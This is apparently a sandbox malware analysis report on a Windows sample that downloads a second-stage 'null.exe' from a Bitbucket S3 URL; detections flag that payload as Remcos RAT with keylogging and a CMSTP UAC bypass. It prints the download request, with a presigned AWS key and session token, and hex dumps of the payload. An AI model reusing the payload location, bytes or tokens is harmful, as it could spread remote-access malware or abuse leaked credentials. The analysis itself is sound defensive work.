                                                                                                                                            Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-e [TRUNCATED]
                                                                                                                                            X-Usage-Quota-Remaining: 999078.206
                                                                                                                                            X-Usage-Request-Cost: 936.27
                                                                                                                                            X-Usage-User-Time: 0.028088
                                                                                                                                            X-Usage-System-Time: 0.000000
                                                                                                                                            X-Usage-Input-Ops: 0
                                                                                                                                            X-Usage-Output-Ops: 0
                                                                                                                                            Age: 0
                                                                                                                                            X-Cache: MISS
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Xss-Protection: 1; mode=block
                                                                                                                                            Atl-Traceid: 7ecc51800cc1491387e4d5abc579fa23
                                                                                                                                            Atl-Request-Id: 7ecc5180-0cc1-4913-87e4-d5abc579fa23
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                            Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=157,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                            Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49743 | 54.231.203.105 | 443 | 5776 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |

Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:41:42 UTC | 1177 | OUT | GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6l [TRUNCATED]
                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                            Connection: Keep-Alive
2024-12-12 16:41:42 UTC | 538 | IN | HTTP/1.1 200 OK
                                                                                                                                            x-amz-id-2: ft8JI2Fuomh+dVTvww57rQbzQt4l8odBqwmV1Z7Oz+dzWjeWDY71vzIYHh1lZ8UmtsVouqjtOiY=
                                                                                                                                            x-amz-request-id: YWC2HAZDHK2FQTDB
                                                                                                                                            Date: Thu, 12 Dec 2024 16:41:43 GMT
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 14:47:44 GMT
                                                                                                                                            ETag: "27650afe28ba588c759ade95bf403833"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            x-amz-version-id: kXXRZ1mUq75DO3FONi1exQQCVC7lCh3.
                                                                                                                                            Content-Disposition: attachment; filename="null.exe"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                            Content-Length: 4054528
                                                                                                                                            Server: AmazonS3
                                                                                                                                            Connection: close
                                                                                                                                            Data Ascii: $@@E@E@E@E@E@PB@lB@B@EMathError|@|@@E@E@E@E@E@PB@lB@B@EInvalidOp@@@E@E@E@E@E@PB@lB@B@EZeroDivide,@
                                                                                                                                            2024-12-12 16:41:43 UTC1024INData Raw: 00 00 00 8b 45 08 50 0f b7 45 e6 8b 55 f4 e8 33 f8 ff ff 59 e9 dd 02 00 00 55 e8 73 f8 ff ff 59 83 7d f4 01 75 14 8b 45 08 50 a1 a4 c6 61 00 e8 72 fb ff ff 59 e9 bc 02 00 00 8b 45 08 50 a1 a8 c6 61 00 e8 5e fb ff ff 59 e9 a8 02 00 00 55 e8 3e f8 ff ff 59 55 e8 9b f8 ff ff 59 83 7d f4 03 7e 07 c7 45 f4 03 00 00 00 8b 45 08 50 0f b7 45 e4 8b 55 f4 e8 cd f7 ff ff 59 e9 77 02 00 00 55 e8 71 f8 ff ff 59 8b 75 fc 4e ba 1c d5 40 00 b9 05 00 00 00 8b c6 e8 fb dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 03 8b 45 08 50 ba 02 00 00 00 8b c6 e8 29 f7 ff ff 59 83 45 fc 04 c6 45 e2 01 e9 2f 02 00 00 ba 24 d5 40 00 b9 03 00 00 00 8b c6 e8 be dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 02 8b 45 08 50 ba 01 00 00 00 8b c6 e8 ec f6 ff ff 59 83 45 fc 02 c6 45 e2 01
                                                                                                                                            Data Ascii: EPEU3YUsY}uEParYEPa^YU>YUY}~EEPEUYwUqYuN@u(f}rEP)YEE/$@u(f}rEPYEE
                                                                                                                                            2024-12-12 16:41:43 UTC16384INData Raw: ff 75 08 92 e8 51 ff ff ff 5d c2 08 00 90 53 56 57 8b fa 8b f0 8b 1f eb 01 43 8b c6 e8 c1 7d ff ff 3b d8 7f 07 80 7c 1e ff 20 74 ed 89 1f 5f 5e 5b c3 55 8b ec 83 c4 f4 53 56 57 89 4d f8 89 55 fc 8b f8 c6 45 f7 00 8b 45 08 c6 00 00 8b 55 fc 8b c7 e8 b7 ff ff ff 8b 5d fc 8b 1b 33 f6 eb 17 8b c6 03 c0 8d 04 80 33 d2 8a 54 1f ff 66 83 ea 30 66 03 c2 8b f0 43 8b c7 e8 64 7d ff ff 3b d8 7f 11 8a 44 1f ff 04 d0 2c 0a 73 07 66 81 fe e8 03 72 cd 8b 45 fc 3b 18 7e 1d 8b c3 8b 55 fc 8b 12 2a c2 8b 55 08 88 02 8b 45 fc 89 18 8b 45 f8 66 89 30 c6 45 f7 01 8a 45 f7 5f 5e 5b 8b e5 5d c2 04 00 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f9 8b f2 89 45 fc 33 c0 55 68 25 d7 40 00 64 ff 30 64 89 20 33 db 85 ff 74 3a 8b d6 8b 45 fc e8 15 ff ff ff 8d 45 f8 50 8b c7
                                                                                                                                            Data Ascii: uQ]SVWC};| t_^[USVWMUEEU]33Tf0fCd};D,sfrE;~U*UEEf0EE_^[]@USVW3]E3Uh%@d0d 3t:EEP
                                                                                                                                            2024-12-12 16:41:43 UTC1024INData Raw: 61 6e 74 42 61 64 49 6e 64 65 78 45 72 72 6f 72 8b c0 44 16 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 16 41 00 0c 00 00 00 10 96 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 18 45 56 61 72 69 61 6e 74 41 72 72 61 79 4c 6f 63 6b 65 64 45 72 72 6f 72 8d 40 00 ac 16 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 16 41 00 0c 00 00 00 10 96 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 18 45 56 61 72 69 61 6e 74 41 72 72 61 79 43 72 65 61 74 65 45 72 72 6f 72 8d 40 00 14 17 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: antBadIndexErrorDADA@E@E@E@E@E@PB@lB@B@EVariantArrayLockedError@AA@E@E@E@E@E@PB@lB@B@EVariantArrayCreateError@A
                                                                                                                                            2024-12-12 16:41:43 UTC16384INData Raw: ff ff 33 c0 5a 59 59 64 89 10 68 05 1a 41 00 8d 45 fc e8 0b 37 ff ff c3 e9 49 30 ff ff eb f0 59 5d c3 55 8b ec 6a 00 33 c0 55 68 52 1a 41 00 64 ff 30 64 89 20 8d 55 fc a1 18 af 61 00 e8 ac 5a ff ff 8b 4d fc b2 01 a1 5c 18 41 00 e8 7d cd ff ff e8 48 30 ff ff 33 c0 5a 59 59 64 89 10 68 59 1a 41 00 8d 45 fc e8 b7 36 ff ff c3 e9 f5 2f ff ff eb f0 59 5d c3 55 8b ec 83 c4 e4 53 56 33 c9 89 4d ec 89 4d e8 89 4d e4 8b f2 8b d8 33 c0 55 68 eb 1a 41 00 64 ff 30 64 89 20 8d 55 ec 8b c3 e8 05 6a 00 00 8b 45 ec 89 45 f0 c6 45 f4 0b 8d 55 e8 8b c6 e8 f1 69 00 00 8b 45 e8 89 45 f8 c6 45 fc 0b 8d 45 f0 50 6a 01 8d 55 e4 a1 60 b0 61 00 e8 18 5a ff ff 8b 4d e4 b2 01 a1 68 14 41 00 e8 25 cd ff ff e8 b4 2f ff ff 33 c0 5a 59 59 64 89 10 68 f2 1a 41 00 8d 45 e4 ba 03 00 00 00
                                                                                                                                            Data Ascii: 3ZYYdhAE7I0Y]Uj3UhRAd0d UaZM\A}H03ZYYdhYAE6/Y]USV3MMM3UhAd0d UjEEEUiEEEEPjU`aZMhA%/3ZYYdhAE
                                                                                                                                            2024-12-12 16:41:43 UTC1024INData Raw: 02 00 00 ff 73 0c ff 73 08 8d 45 c8 e8 cd 49 ff ff 8b 55 c8 8b c6 e8 5b f7 fe ff e9 9e 02 00 00 8b 43 08 8b d0 8b c6 e8 aa fd ff ff e9 8d 02 00 00 8d 55 c4 8b c3 e8 e7 fb ff ff 8b 55 c4 8b c6 e8 31 f7 fe ff e9 74 02 00 00 8b d0 66 81 ea 00 01 74 07 66 ff ca 74 11 eb 28 8b c6 8b 53 08 e8 12 f7 fe ff e9 55 02 00 00 8d 55 c0 8b c3 e8 7b fc ff ff 8b 55 c0 8b c6 e8 f9 f6 fe ff e9 3c 02 00 00 f6 c4 40 0f 84 0b 02 00 00 0f b7 c0 25 ff bf ff ff 83 f8 14 0f 87 e4 01 00 00 ff 24 85 89 5a 41 00 66 5c 41 00 66 5c 41 00 dd 5a 41 00 fa 5a 41 00 16 5b 41 00 39 5b 41 00 5c 5b 41 00 7b 5b 41 00 9a 5b 41 00 66 5c 41 00 66 5c 41 00 ab 5b 41 00 58 5c 41 00 66 5c 41 00 66 5c 41 00 66 5c 41 00 c8 5b 41 00 e5 5b 41 00 02 5c 41 00 1f 5c 41 00 3c 5c 41 00 8d 55 bc 8b 43 08 0f bf
                                                                                                                                            Data Ascii: ssEIU[CUU1tftft(SUU{U<@%$ZAf\Af\AZAZA[A9[A\[A{[A[Af\Af\A[AX\Af\Af\Af\A[A[A\A\A<\AUC



                                                                                                                                            Target ID:0
                                                                                                                                            Start time:11:41:15
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\3XSXmrEOw7.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\3XSXmrEOw7.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:2'605'056 bytes
                                                                                                                                            MD5 hash:DDCE3B9704D1E4236548B1A458317DD0
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:11:41:32
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                            Imagebase:0x370000
                                                                                                                                            File size:2'141'552 bytes
                                                                                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3994827103.0000000009880000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3993975930.0000000007FB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:11:41:52
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:4'054'528 bytes
                                                                                                                                            MD5 hash:27650AFE28BA588C759ADE95BF403833
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000002.2829283806.0000000013590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:11:42:14
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\yjfesx.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:4'054'528 bytes
                                                                                                                                            MD5 hash:27650AFE28BA588C759ADE95BF403833
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false


                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0.2%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:66.7%
                                                                                                                                              Total number of Nodes:9
                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                              execution_graph 28438 409f24 28439 409f54 ExitProcess 28438->28439 28441 40813a 28442 40813c VirtualProtect 28441->28442 28444 4081a1 28442->28444 28445 408828 28444->28445 28448 4094b9 28444->28448 28455 4089ff 18 API calls 28445->28455 28456 4095cc 8 API calls 28448->28456

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$YQ$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-1402221123
                                                                                                                                              • Opcode ID: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                                              • Instruction ID: 552b3e37006ca7b93b7341b10d5ba12ce664671d15c095bbf474118e4d211da1
                                                                                                                                              • Opcode Fuzzy Hash: 7c20f8dc98d7115db943d6b1e10bfc1683e3d64e3185a16b1407a21c0f57b41c
                                                                                                                                              • Instruction Fuzzy Hash: 30E125A2C082649AF7208624DC45BEB7A79DF50314F0440FED94D662C1DABE5FC58BA7
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                                              • Instruction ID: a0810739b08e09db0114f26d69ccb1495e1e5597be628df8a29aa899d8e24c60
                                                                                                                                              • Opcode Fuzzy Hash: 4c1d08d73541cbc7a277f5de330505408b5612a8ebe57e9a427c239e2cab2788
                                                                                                                                              • Instruction Fuzzy Hash: 8EF123A2C042649AF7208624DC447FB7A78EF51310F1440FED94DA62C1E6BE4FD6CB66

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                                              • Instruction ID: fe1b180f35ded295e356599168183658795d2bfc2890c1e042ad3a4d1c9d819f
                                                                                                                                              • Opcode Fuzzy Hash: 7e582c5f3101599f140a86f8967673f103552689eeb40852df6de6cbbdcda19e
                                                                                                                                              • Instruction Fuzzy Hash: D3F137E2D042649EF7208624EC44BE77A78EB51314F1440FED94DA62C0D6BE5FC68BA7

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 144 4074f5-407524 145 407535-407586 144->145 146 407526-407530 144->146 155 407594-4075c6 call 4075b5 145->155 156 407588 145->156 147 4075d0-4075d7 146->147 149 407619 147->149 150 4075d9-407631 147->150 149->149 161 4076d3-407714 call 407716 150->161 162 407637-407690 150->162 155->147 156->155 162->161 168 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 162->168 194 408828-408a77 call 4089ff 168->194 195 4094b9-4095cb call 4094db call 40950b call 4095cc 168->195 211 408a79-408ab5 194->211 212 408aba-408ae7 call 408ae8 194->212 225 409f60-409f62 ExitProcess 195->225 221 408e4f-408e56 211->221 212->221 222 408e58-408e94 221->222 223 408e99-408ecf call 408ed1 221->223 222->225 223->225
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                                              • Instruction ID: f8ae071597d0369a0ea6e5a7ef278c1cd42b05d95af171ce00d2b1dc5b51714e
                                                                                                                                              • Opcode Fuzzy Hash: 763e98e61c6b49b07462a2c8dbb8857cf064c3c576dc90e8bcb5013b44e6286e
                                                                                                                                              • Instruction Fuzzy Hash: D2F146B2C082649AF7208624DC847EB7A79DF51314F1440FED94D662C1DABE1FC68B67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 230 407ce7-407d0a 231 407d0c-407d4a 230->231 232 407d4f-407d90 230->232 234 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 231->234 238 407d92-407dd0 232->238 239 407dd5-407e99 232->239 262 408828-408a77 call 4089ff 234->262 263 4094b9-4095cb call 4094db call 40950b call 4095cc 234->263 238->234 244 408162-408168 239->244 245 407e9f-407eb5 call 407eb6 239->245 244->234 245->244 279 408a79-408ab5 262->279 280 408aba-408ae7 call 408ae8 262->280 293 409f60-409f62 ExitProcess 263->293 289 408e4f-408e56 279->289 280->289 290 408e58-408e94 289->290 291 408e99-408ecf call 408ed1 289->291 290->293 291->293
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                                              • Instruction ID: df8e3fcac33211f4c5b008abac8f8c68894361ab22a79a16978cd784f9a3db6b
                                                                                                                                              • Opcode Fuzzy Hash: 026932607235a52f7d863d2866d8b306e01cc66e42a3e4510ad1a7c595773086
                                                                                                                                              • Instruction Fuzzy Hash: BBF105B2D042649BF7208624DC84BEB7A79EF90310F1480FED94D67281D6BD5FC68B66

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
                                                                                                                                              • Instruction ID: b45db600def9cba6b152f9bae71686f50ffbe3404f9396e81384a605f94926e6
                                                                                                                                              • Opcode Fuzzy Hash: e8ceced950599952926a2a7048b19e50167d42c1a8fc9a1751870ae93f3295a2
